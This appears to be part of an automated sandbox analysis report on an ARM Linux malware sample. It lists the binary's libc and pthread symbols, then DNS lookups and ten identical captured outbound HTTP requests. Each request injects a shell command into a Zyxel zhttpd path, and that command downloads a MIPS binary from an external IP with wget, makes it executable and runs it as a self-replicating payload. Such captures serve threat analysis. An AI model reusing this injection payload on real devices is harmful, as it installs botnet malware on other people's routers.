                                                __GI_atoi.symtab0x1c8d032FUNC<unknown>HIDDEN2
                                                __GI_bind.symtab0x1a89468FUNC<unknown>HIDDEN2
                                                __GI_brk.symtab0x212fc88FUNC<unknown>HIDDEN2
                                                __GI_close.symtab0x1db10100FUNC<unknown>HIDDEN2
                                                __GI_closedir.symtab0x1796c272FUNC<unknown>HIDDEN2
                                                __GI_config_close.symtab0x1f56c52FUNC<unknown>HIDDEN2
                                                __GI_config_open.symtab0x1f5a072FUNC<unknown>HIDDEN2
                                                __GI_config_read.symtab0x1f244808FUNC<unknown>HIDDEN2
                                                __GI_connect.symtab0x1a91c116FUNC<unknown>HIDDEN2
                                                __GI_exit.symtab0x1cae4196FUNC<unknown>HIDDEN2
                                                __GI_fclose.symtab0x17ddc816FUNC<unknown>HIDDEN2
                                                __GI_fcntl.symtab0x16fc0244FUNC<unknown>HIDDEN2
                                                __GI_fflush_unlocked.symtab0x19d28940FUNC<unknown>HIDDEN2
                                                __GI_fgetc.symtab0x20578324FUNC<unknown>HIDDEN2
                                                __GI_fgetc_unlocked.symtab0x206bc300FUNC<unknown>HIDDEN2
                                                __GI_fgets.symtab0x1995c284FUNC<unknown>HIDDEN2
                                                __GI_fgets_unlocked.symtab0x1a0d4160FUNC<unknown>HIDDEN2
                                                __GI_fopen.symtab0x1810c32FUNC<unknown>HIDDEN2
                                                __GI_fork.symtab0x1d37c972FUNC<unknown>HIDDEN2
                                                __GI_fprintf.symtab0x1f71c48FUNC<unknown>HIDDEN2
                                                __GI_fputs_unlocked.symtab0x1a17456FUNC<unknown>HIDDEN2
                                                __GI_fseek.symtab0x2149c36FUNC<unknown>HIDDEN2
                                                __GI_fseeko64.symtab0x214c0448FUNC<unknown>HIDDEN2
                                                __GI_fstat.symtab0x1edf4100FUNC<unknown>HIDDEN2
                                                __GI_fwrite_unlocked.symtab0x1a1ac188FUNC<unknown>HIDDEN2
                                                __GI_getc_unlocked.symtab0x206bc300FUNC<unknown>HIDDEN2
                                                __GI_getdtablesize.symtab0x1eef844FUNC<unknown>HIDDEN2
                                                __GI_getegid.symtab0x1ef2420FUNC<unknown>HIDDEN2
                                                __GI_geteuid.symtab0x1ef3820FUNC<unknown>HIDDEN2
                                                __GI_getgid.symtab0x1ef4c20FUNC<unknown>HIDDEN2
                                                __GI_getpagesize.symtab0x1715c40FUNC<unknown>HIDDEN2
                                                __GI_getpid.symtab0x1d97872FUNC<unknown>HIDDEN2
                                                __GI_getrlimit.symtab0x1719856FUNC<unknown>HIDDEN2
                                                __GI_getsockname.symtab0x1a99068FUNC<unknown>HIDDEN2
                                                __GI_gettimeofday.symtab0x171d064FUNC<unknown>HIDDEN2
                                                __GI_getuid.symtab0x1ef6020FUNC<unknown>HIDDEN2
                                                __GI_inet_addr.symtab0x1a7b440FUNC<unknown>HIDDEN2
                                                __GI_inet_aton.symtab0x211c4248FUNC<unknown>HIDDEN2
                                                __GI_initstate_r.symtab0x1c6ec248FUNC<unknown>HIDDEN2
                                                __GI_ioctl.symtab0x1ef74224FUNC<unknown>HIDDEN2
                                                __GI_isatty.symtab0x1a71436FUNC<unknown>HIDDEN2
                                                __GI_kill.symtab0x1721056FUNC<unknown>HIDDEN2
                                                __GI_listen.symtab0x1aa1c64FUNC<unknown>HIDDEN2
                                                __GI_lseek64.symtab0x21960112FUNC<unknown>HIDDEN2
                                                __GI_memchr.symtab0x20c80240FUNC<unknown>HIDDEN2
                                                __GI_memcpy.symtab0x1a2704FUNC<unknown>HIDDEN2
                                                __GI_memmove.symtab0x1a2804FUNC<unknown>HIDDEN2
                                                __GI_mempcpy.symtab0x1a3b036FUNC<unknown>HIDDEN2
                                                __GI_memrchr.symtab0x20d70224FUNC<unknown>HIDDEN2
                                                __GI_memset.symtab0x1a290156FUNC<unknown>HIDDEN2
                                                __GI_mmap.symtab0x16e04124FUNC<unknown>HIDDEN2
                                                __GI_mremap.symtab0x1f05468FUNC<unknown>HIDDEN2
                                                __GI_munmap.symtab0x1730064FUNC<unknown>HIDDEN2
                                                __GI_nanosleep.symtab0x1738096FUNC<unknown>HIDDEN2
                                                __GI_open.symtab0x1dba0100FUNC<unknown>HIDDEN2
                                                __GI_opendir.symtab0x17b4c196FUNC<unknown>HIDDEN2
                                                __GI_raise.symtab0x1d9c0240FUNC<unknown>HIDDEN2
                                                __GI_random.symtab0x1c2c4164FUNC<unknown>HIDDEN2
                                                __GI_random_r.symtab0x1c584144FUNC<unknown>HIDDEN2
                                                __GI_rawmemchr.symtab0x218b0176FUNC<unknown>HIDDEN2
                                                __GI_read.symtab0x1dcc0100FUNC<unknown>HIDDEN2
                                                __GI_readdir.symtab0x17cc0232FUNC<unknown>HIDDEN2
                                                __GI_readdir64.symtab0x1f158236FUNC<unknown>HIDDEN2
                                                __GI_readlink.symtab0x1742464FUNC<unknown>HIDDEN2
                                                __GI_recv.symtab0x1aaa0112FUNC<unknown>HIDDEN2
                                                __GI_recvfrom.symtab0x1ab58136FUNC<unknown>HIDDEN2
                                                __GI_remove.symtab0x1812c100FUNC<unknown>HIDDEN2
                                                __GI_rmdir.symtab0x1f09864FUNC<unknown>HIDDEN2
                                                __GI_sbrk.symtab0x1f0d8108FUNC<unknown>HIDDEN2
                                                __GI_select.symtab0x175d0132FUNC<unknown>HIDDEN2
                                                __GI_send.symtab0x1ac24112FUNC<unknown>HIDDEN2
                                                __GI_sendto.symtab0x1ace0136FUNC<unknown>HIDDEN2
                                                __GI_setsid.symtab0x1765464FUNC<unknown>HIDDEN2
                                                __GI_setsockopt.symtab0x1ad6872FUNC<unknown>HIDDEN2
                                                __GI_setstate_r.symtab0x1c7e4236FUNC<unknown>HIDDEN2
                                                __GI_sigaction.symtab0x16e80136FUNC<unknown>HIDDEN2
                                                __GI_sigprocmask.symtab0x17694140FUNC<unknown>HIDDEN2
                                                __GI_snprintf.symtab0x1819048FUNC<unknown>HIDDEN2
                                                __GI_socket.symtab0x1adb068FUNC<unknown>HIDDEN2
                                                __GI_sprintf.symtab0x181c052FUNC<unknown>HIDDEN2
                                                __GI_srandom_r.symtab0x1c614216FUNC<unknown>HIDDEN2
                                                __GI_stat.symtab0x17720100FUNC<unknown>HIDDEN2
                                                __GI_strchr.symtab0x20e50240FUNC<unknown>HIDDEN2
                                                __GI_strchrnul.symtab0x20f40236FUNC<unknown>HIDDEN2
                                                __GI_strcmp.symtab0x1a33028FUNC<unknown>HIDDEN2
                                                __GI_strcoll.symtab0x1a33028FUNC<unknown>HIDDEN2
                                                __GI_strcpy.symtab0x1a3d436FUNC<unknown>HIDDEN2
                                                __GI_strcspn.symtab0x2102c68FUNC<unknown>HIDDEN2
                                                __GI_strlen.symtab0x1a35096FUNC<unknown>HIDDEN2
                                                __GI_strnlen.symtab0x1a3f8204FUNC<unknown>HIDDEN2
                                                __GI_strpbrk.symtab0x2118464FUNC<unknown>HIDDEN2
                                                __GI_strrchr.symtab0x2107080FUNC<unknown>HIDDEN2
                                                __GI_strspn.symtab0x210c076FUNC<unknown>HIDDEN2
                                                __GI_strstr.symtab0x1a4c4252FUNC<unknown>HIDDEN2
                                                __GI_strtok.symtab0x1a6e448FUNC<unknown>HIDDEN2
                                                __GI_strtok_r.symtab0x2110c120FUNC<unknown>HIDDEN2
                                                __GI_strtol.symtab0x1c8f028FUNC<unknown>HIDDEN2
                                                __GI_sysconf.symtab0x1ccf41572FUNC<unknown>HIDDEN2
                                                __GI_tcgetattr.symtab0x1a738124FUNC<unknown>HIDDEN2
                                                __GI_time.symtab0x1778448FUNC<unknown>HIDDEN2
                                                __GI_times.symtab0x1f14420FUNC<unknown>HIDDEN2
                                                __GI_unlink.symtab0x177b464FUNC<unknown>HIDDEN2
                                                __GI_vfprintf.symtab0x20434324FUNC<unknown>HIDDEN2
                                                __GI_vsnprintf.symtab0x181f4208FUNC<unknown>HIDDEN2
                                                __GI_wcrtomb.symtab0x1f5e884FUNC<unknown>HIDDEN2
                                                __GI_wcsnrtombs.symtab0x1f660188FUNC<unknown>HIDDEN2
                                                __GI_wcsrtombs.symtab0x1f63c36FUNC<unknown>HIDDEN2
                                                __GI_write.symtab0x1dc30100FUNC<unknown>HIDDEN2
                                                __JCR_END__.symtab0x2d0100OBJECT<unknown>DEFAULT12
                                                __JCR_LIST__.symtab0x2d0100OBJECT<unknown>DEFAULT12
                                                ___Unwind_ForcedUnwind.symtab0x1660c36FUNC<unknown>HIDDEN2
                                                ___Unwind_RaiseException.symtab0x165a036FUNC<unknown>HIDDEN2
                                                ___Unwind_Resume.symtab0x165c436FUNC<unknown>HIDDEN2
                                                ___Unwind_Resume_or_Rethrow.symtab0x165e836FUNC<unknown>HIDDEN2
                                                __adddf3.symtab0x219dc784FUNC<unknown>HIDDEN2
                                                __aeabi_cdcmpeq.symtab0x2233824FUNC<unknown>HIDDEN2
                                                __aeabi_cdcmple.symtab0x2233824FUNC<unknown>HIDDEN2
                                                __aeabi_cdrcmple.symtab0x2231c52FUNC<unknown>HIDDEN2
                                                __aeabi_d2uiz.symtab0x223c884FUNC<unknown>HIDDEN2
                                                __aeabi_dadd.symtab0x219dc784FUNC<unknown>HIDDEN2
                                                __aeabi_dcmpeq.symtab0x2235024FUNC<unknown>HIDDEN2
                                                __aeabi_dcmpge.symtab0x2239824FUNC<unknown>HIDDEN2
                                                __aeabi_dcmpgt.symtab0x223b024FUNC<unknown>HIDDEN2
                                                __aeabi_dcmple.symtab0x2238024FUNC<unknown>HIDDEN2
                                                __aeabi_dcmplt.symtab0x2236824FUNC<unknown>HIDDEN2
                                                __aeabi_ddiv.symtab0x2207c524FUNC<unknown>HIDDEN2
                                                __aeabi_dmul.symtab0x21dec656FUNC<unknown>HIDDEN2
                                                __aeabi_drsub.symtab0x219d00FUNC<unknown>HIDDEN2
                                                __aeabi_dsub.symtab0x219d8788FUNC<unknown>HIDDEN2
                                                __aeabi_f2d.symtab0x21d3864FUNC<unknown>HIDDEN2
                                                __aeabi_i2d.symtab0x21d1040FUNC<unknown>HIDDEN2
                                                __aeabi_idiv.symtab0x157600FUNC<unknown>HIDDEN2
                                                __aeabi_idivmod.symtab0x1588c24FUNC<unknown>HIDDEN2
                                                __aeabi_l2d.symtab0x21d8c96FUNC<unknown>HIDDEN2
                                                __aeabi_read_tp.symtab0x111a08FUNC<unknown>HIDDEN2
                                                __aeabi_ui2d.symtab0x21cec36FUNC<unknown>HIDDEN2
                                                __aeabi_uidiv.symtab0x1564c0FUNC<unknown>HIDDEN2
                                                __aeabi_uidivmod.symtab0x1574824FUNC<unknown>HIDDEN2
                                                __aeabi_ul2d.symtab0x21d78116FUNC<unknown>HIDDEN2
                                                __aeabi_unwind_cpp_pr0.symtab0x1656c8FUNC<unknown>HIDDEN2
                                                __aeabi_unwind_cpp_pr1.symtab0x165648FUNC<unknown>HIDDEN2
                                                __aeabi_unwind_cpp_pr2.symtab0x1655c8FUNC<unknown>HIDDEN2
                                                __app_fini.symtab0x321ac4OBJECT<unknown>HIDDEN15
                                                __atexit_lock.symtab0x2d3ac24OBJECT<unknown>DEFAULT14
                                                __bss_end__.symtab0x326380NOTYPE<unknown>DEFAULTSHN_ABS
                                                __bss_start.symtab0x2d3dc0NOTYPE<unknown>DEFAULTSHN_ABS
                                                __bss_start__.symtab0x2d3dc0NOTYPE<unknown>DEFAULTSHN_ABS
                                                __check_one_fd.symtab0x1e91084FUNC<unknown>DEFAULT2
                                                __clone.symtab0x1d318100FUNC<unknown>DEFAULT2
                                                __close.symtab0x1db10100FUNC<unknown>DEFAULT2
                                                __close_nocancel.symtab0x1daf424FUNC<unknown>DEFAULT2
                                                __cmpdf2.symtab0x22298132FUNC<unknown>HIDDEN2
                                                __ctype_b.symtab0x2d3d84OBJECT<unknown>DEFAULT14
                                                __curbrk.symtab0x321b44OBJECT<unknown>HIDDEN15
                                                __cxa_begin_cleanup.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                __cxa_call_unexpected.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                __cxa_type_match.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                __data_start.symtab0x2d0d40NOTYPE<unknown>DEFAULT14
                                                __deallocate_stack.symtab0x11cbc304FUNC<unknown>HIDDEN2
                                                __default_rt_sa_restorer.symtab0x16f200FUNC<unknown>DEFAULT2
                                                __default_sa_restorer.symtab0x16f140FUNC<unknown>DEFAULT2
                                                __default_stacksize.symtab0x2d1d84OBJECT<unknown>HIDDEN14
                                                __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                __div0.symtab0x158a420FUNC<unknown>HIDDEN2
                                                __divdf3.symtab0x2207c524FUNC<unknown>HIDDEN2
                                                __divsi3.symtab0x15760300FUNC<unknown>HIDDEN2
                                                __do_global_dtors_aux.symtab0x80f00FUNC<unknown>DEFAULT2
                                                __do_global_dtors_aux_fini_array_entry.symtab0x2d00c0OBJECT<unknown>DEFAULT11
                                                __end__.symtab0x326380NOTYPE<unknown>DEFAULTSHN_ABS
                                                __environ.symtab0x321a44OBJECT<unknown>DEFAULT15
                                                __eqdf2.symtab0x22298132FUNC<unknown>HIDDEN2
                                                __errno_location.symtab0x111fc32FUNC<unknown>DEFAULT2
                                                __error.symtab0x1d3780NOTYPE<unknown>DEFAULT2
                                                __exidx_end.symtab0x24c780NOTYPE<unknown>DEFAULTSHN_ABS
                                                __exidx_start.symtab0x24b080NOTYPE<unknown>DEFAULTSHN_ABS
                                                __exit_cleanup.symtab0x317184OBJECT<unknown>HIDDEN15
                                                __extendsfdf2.symtab0x21d3864FUNC<unknown>HIDDEN2
                                                __fcntl_nocancel.symtab0x16f28152FUNC<unknown>DEFAULT2
                                                __fgetc_unlocked.symtab0x206bc300FUNC<unknown>DEFAULT2
                                                __find_in_stack_list.symtab0x114b0308FUNC<unknown>HIDDEN2
                                                __fini_array_end.symtab0x2d0100NOTYPE<unknown>HIDDEN11
                                                __fini_array_start.symtab0x2d00c0NOTYPE<unknown>HIDDEN11
                                                __fixunsdfsi.symtab0x223c884FUNC<unknown>HIDDEN2
                                                __floatdidf.symtab0x21d8c96FUNC<unknown>HIDDEN2
                                                __floatsidf.symtab0x21d1040FUNC<unknown>HIDDEN2
                                                __floatundidf.symtab0x21d78116FUNC<unknown>HIDDEN2
                                                __floatunsidf.symtab0x21cec36FUNC<unknown>HIDDEN2
                                                __fork.symtab0x1107424FUNC<unknown>DEFAULT2
                                                __fork_generation.symtab0x322284OBJECT<unknown>HIDDEN15
                                                __fork_generation_pointer.symtab0x326044OBJECT<unknown>HIDDEN15
                                                __fork_handlers.symtab0x326084OBJECT<unknown>HIDDEN15
                                                __fork_lock.symtab0x3171c4OBJECT<unknown>HIDDEN15
                                                __frame_dummy_init_array_entry.symtab0x2d0080OBJECT<unknown>DEFAULT10
                                                __free_stacks.symtab0x11c18164FUNC<unknown>HIDDEN2
                                                __free_tcb.symtab0x11dec116FUNC<unknown>HIDDEN2
                                                __gedf2.symtab0x22288148FUNC<unknown>HIDDEN2
                                                __getdents.symtab0x1ee58160FUNC<unknown>HIDDEN2
                                                __getdents64.symtab0x21354328FUNC<unknown>HIDDEN2
                                                __getpagesize.symtab0x1715c40FUNC<unknown>DEFAULT2
                                                __getpid.symtab0x1d97872FUNC<unknown>DEFAULT2
                                                __glibc_strerror_r.symtab0x1a5c024FUNC<unknown>DEFAULT2
                                                __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                __gnu_Unwind_Find_exidx.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                __gnu_Unwind_ForcedUnwind.symtab0x15d1028FUNC<unknown>HIDDEN2
                                                __gnu_Unwind_RaiseException.symtab0x15df8184FUNC<unknown>HIDDEN2
                                                __gnu_Unwind_Restore_VFP.symtab0x165900FUNC<unknown>HIDDEN2
                                                __gnu_Unwind_Resume.symtab0x15d8c108FUNC<unknown>HIDDEN2
                                                __gnu_Unwind_Resume_or_Rethrow.symtab0x15eb032FUNC<unknown>HIDDEN2
                                                __gnu_Unwind_Save_VFP.symtab0x165980FUNC<unknown>HIDDEN2
                                                __gnu_unwind_execute.symtab0x166741812FUNC<unknown>HIDDEN2
                                                __gnu_unwind_frame.symtab0x16d8872FUNC<unknown>HIDDEN2
                                                __gnu_unwind_pr_common.symtab0x160141352FUNC<unknown>DEFAULT2
                                                __gtdf2.symtab0x22288148FUNC<unknown>HIDDEN2
                                                __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                __init_array_end.symtab0x2d00c0NOTYPE<unknown>HIDDEN10
                                                __init_array_start.symtab0x2d0080NOTYPE<unknown>HIDDEN10
                                                __init_sched_fifo_prio.symtab0x14ab476FUNC<unknown>HIDDEN2
                                                __is_smp.symtab0x322204OBJECT<unknown>HIDDEN15
                                                __ledf2.symtab0x22290140FUNC<unknown>HIDDEN2
                                                __libc_accept.symtab0x1a820116FUNC<unknown>DEFAULT2
                                                __libc_close.symtab0x1db10100FUNC<unknown>DEFAULT2
                                                __libc_connect.symtab0x1a91c116FUNC<unknown>DEFAULT2
                                                __libc_disable_asynccancel.symtab0x1dd30136FUNC<unknown>HIDDEN2
                                                __libc_enable_asynccancel.symtab0x1ddb8220FUNC<unknown>HIDDEN2
                                                __libc_errno.symtab0x44TLS<unknown>HIDDEN9
                                                __libc_fcntl.symtab0x16fc0244FUNC<unknown>DEFAULT2
                                                __libc_fork.symtab0x1d37c972FUNC<unknown>DEFAULT2
                                                __libc_h_errno.symtab0x84TLS<unknown>HIDDEN9
                                                __libc_longjmp.symtab0x1724856FUNC<unknown>DEFAULT2
                                                __libc_multiple_threads.symtab0x3260c4OBJECT<unknown>HIDDEN15
                                                __libc_multiple_threads_ptr.symtab0x3221c4OBJECT<unknown>HIDDEN15
                                                __libc_nanosleep.symtab0x1738096FUNC<unknown>DEFAULT2
                                                __libc_open.symtab0x1dba0100FUNC<unknown>DEFAULT2
                                                __libc_pthread_init.symtab0x1d74868FUNC<unknown>DEFAULT2
                                                __libc_read.symtab0x1dcc0100FUNC<unknown>DEFAULT2
                                                __libc_recv.symtab0x1aaa0112FUNC<unknown>DEFAULT2
                                                __libc_recvfrom.symtab0x1ab58136FUNC<unknown>DEFAULT2
                                                __libc_resp.symtab0x04TLS<unknown>HIDDEN8
                                                __libc_select.symtab0x175d0132FUNC<unknown>DEFAULT2
                                                __libc_send.symtab0x1ac24112FUNC<unknown>DEFAULT2
                                                __libc_sendto.symtab0x1ace0136FUNC<unknown>DEFAULT2
                                                __libc_setup_tls.symtab0x1df98560FUNC<unknown>DEFAULT2
                                                __libc_sigaction.symtab0x16e80136FUNC<unknown>DEFAULT2
                                                __libc_siglongjmp.symtab0x1724856FUNC<unknown>DEFAULT2
                                                __libc_stack_end.symtab0x321a04OBJECT<unknown>DEFAULT15
                                                __libc_write.symtab0x1dc30100FUNC<unknown>DEFAULT2
                                                __linkin_atfork.symtab0x1d78c100FUNC<unknown>HIDDEN2
                                                __lll_lock_wait.symtab0x144ac156FUNC<unknown>HIDDEN2
                                                __lll_lock_wait_private.symtab0x14414152FUNC<unknown>HIDDEN2
                                                __lll_robust_lock_wait.symtab0x1489c208FUNC<unknown>HIDDEN2
                                                __lll_robust_timedlock_wait.symtab0x14750332FUNC<unknown>HIDDEN2
                                                __lll_timedlock_wait.symtab0x14620304FUNC<unknown>HIDDEN2
                                                __lll_timedwait_tid.symtab0x14548216FUNC<unknown>HIDDEN2
                                                __longjmp.symtab0x1edd420FUNC<unknown>DEFAULT2
                                                __ltdf2.symtab0x22290140FUNC<unknown>HIDDEN2
                                                __make_stacks_executable.symtab0x11adc8FUNC<unknown>HIDDEN2
                                                __malloc_consolidate.symtab0x1bd54436FUNC<unknown>HIDDEN2
                                                __malloc_largebin_index.symtab0x1adf4120FUNC<unknown>DEFAULT2
                                                __malloc_lock.symtab0x2d2d024OBJECT<unknown>DEFAULT14
                                                __malloc_state.symtab0x3228c888OBJECT<unknown>DEFAULT15
                                                __malloc_trim.symtab0x1bca4176FUNC<unknown>DEFAULT2
                                                __muldf3.symtab0x21dec656FUNC<unknown>HIDDEN2
                                                __nedf2.symtab0x22298132FUNC<unknown>HIDDEN2
                                                __nptl_create_event.symtab0x151084FUNC<unknown>DEFAULT2
                                                __nptl_deallocate_tsd.symtab0x11ae4308FUNC<unknown>HIDDEN2
                                                __nptl_death_event.symtab0x1510c4FUNC<unknown>DEFAULT2
                                                __nptl_initial_report_events.symtab0x2f50c1OBJECT<unknown>DEFAULT15
                                                __nptl_last_event.symtab0x2d4fc4OBJECT<unknown>DEFAULT15
                                                __nptl_nthreads.symtab0x2d1c44OBJECT<unknown>DEFAULT14
                                                __nptl_setxid.symtab0x117e4688FUNC<unknown>HIDDEN2
                                                __nptl_threads_events.symtab0x2d4f48OBJECT<unknown>DEFAULT15
                                                __open.symtab0x1dba0100FUNC<unknown>DEFAULT2
                                                __open_nocancel.symtab0x1db8424FUNC<unknown>DEFAULT2
                                                __pagesize.symtab0x321a84OBJECT<unknown>DEFAULT15
                                                __preinit_array_end.symtab0x2d0080NOTYPE<unknown>HIDDEN9
                                                __preinit_array_start.symtab0x2d0080NOTYPE<unknown>HIDDEN9
                                                __progname.symtab0x2d3cc4OBJECT<unknown>DEFAULT14
                                                __progname_full.symtab0x2d3d04OBJECT<unknown>DEFAULT14
                                                __pthread_cleanup_pop.symtab0x14f3c56FUNC<unknown>HIDDEN2
                                                __pthread_cleanup_pop_restore.symtab0x15018240FUNC<unknown>DEFAULT2
                                                __pthread_cleanup_push.symtab0x14f7440FUNC<unknown>HIDDEN2
                                                __pthread_cleanup_push_defer.symtab0x14f9c124FUNC<unknown>DEFAULT2
                                                __pthread_create_2_1.symtab0x124ac2692FUNC<unknown>DEFAULT2
                                                __pthread_current_priority.symtab0x14974320FUNC<unknown>HIDDEN2
                                                __pthread_debug.symtab0x322184OBJECT<unknown>HIDDEN15
                                                __pthread_disable_asynccancel.symtab0x14dec136FUNC<unknown>HIDDEN2
                                                __pthread_enable_asynccancel.symtab0x14e74200FUNC<unknown>HIDDEN2
                                                __pthread_init_static_tls.symtab0x12f30412FUNC<unknown>HIDDEN2
                                                __pthread_initialize_minimal.symtab0x1535c752FUNC<unknown>DEFAULT2
                                                __pthread_initialize_minimal_internal.symtab0x1535c752FUNC<unknown>HIDDEN2
                                                __pthread_keys.symtab0x2d5088192OBJECT<unknown>DEFAULT15
                                                __pthread_multiple_threads.symtab0x322244OBJECT<unknown>HIDDEN15
                                                __pthread_mutex_lock.symtab0x13a30576FUNC<unknown>PROTECTED2
                                                __pthread_mutex_lock_full.symtab0x1347c1460FUNC<unknown>DEFAULT2
                                                __pthread_mutex_lock_internal.symtab0x13a30576FUNC<unknown>HIDDEN2
                                                __pthread_mutex_unlock.symtab0x1427c8FUNC<unknown>PROTECTED2
                                                __pthread_mutex_unlock_full.symtab0x13c701264FUNC<unknown>DEFAULT2
                                                __pthread_mutex_unlock_internal.symtab0x1427c8FUNC<unknown>HIDDEN2
                                                __pthread_mutex_unlock_usercnt.symtab0x14160284FUNC<unknown>HIDDEN2
                                                __pthread_return_0.symtab0x1e8508FUNC<unknown>DEFAULT2
                                                __pthread_tpp_change_priority.symtab0x14b00748FUNC<unknown>HIDDEN2
                                                __pthread_unwind.symtab0x1428484FUNC<unknown>DEFAULT2
                                                __pthread_unwind_next.symtab0x142d816FUNC<unknown>DEFAULT2
                                                __read.symtab0x1dcc0100FUNC<unknown>DEFAULT2
                                                __read_nocancel.symtab0x1dca424FUNC<unknown>DEFAULT2
                                                __reclaim_stacks.symtab0x130cc548FUNC<unknown>HIDDEN2
                                                __register_atfork.symtab0x1d7f0392FUNC<unknown>DEFAULT2
                                                __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                __resp.symtab0x04TLS<unknown>DEFAULT8
                                                __restore_core_regs.symtab0x1657428FUNC<unknown>HIDDEN2
                                                __rtld_fini.symtab0x321b04OBJECT<unknown>HIDDEN15
                                                __sched_fifo_max_prio.symtab0x2d1e04OBJECT<unknown>HIDDEN14
                                                __sched_fifo_min_prio.symtab0x2d1dc4OBJECT<unknown>HIDDEN14
                                                __set_robust_list_avail.symtab0x322344OBJECT<unknown>HIDDEN15
                                                __sigaction.symtab0x111b076FUNC<unknown>DEFAULT2
                                                __sigjmp_save.symtab0x212bc64FUNC<unknown>HIDDEN2
                                                __sigsetjmp.symtab0x1ede812FUNC<unknown>DEFAULT2
                                                __stack_user.symtab0x2d4e88OBJECT<unknown>DEFAULT15
                                                __static_tls_align_m1.symtab0x3222c4OBJECT<unknown>HIDDEN15
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 29, 2024 07:06:54.735637903 CET192.168.2.238.8.8.80xf031Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 29, 2024 07:06:54.842057943 CET8.8.8.8192.168.2.230xf031No error (0)haha.skyljne.click45.142.182.123A (IP address)IN (0x0001)false
                                                Session IDSource IPSource PortDestination IPDestination Port
                                                0192.168.2.2338076208.217.190.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.786911964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1192.168.2.2333788172.151.118.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787102938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2192.168.2.2334848163.76.172.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787173033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3192.168.2.2352596187.95.64.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787261963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4192.168.2.235107038.163.13.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787352085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5192.168.2.2342456133.96.244.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787358046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6192.168.2.2338684203.166.75.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787425995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7192.168.2.2341592189.199.14.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787484884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8192.168.2.234290646.202.223.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787516117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9192.168.2.233601872.98.130.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.787590027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


